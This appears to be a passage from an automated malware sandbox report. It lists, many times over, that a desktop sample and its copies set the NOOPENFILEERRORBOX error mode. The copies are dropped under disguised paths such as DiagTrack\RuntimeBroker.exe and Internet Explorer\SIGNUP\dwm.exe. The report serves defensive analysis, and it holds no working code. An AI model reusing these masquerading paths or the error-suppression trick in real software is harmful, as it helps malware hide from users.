                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
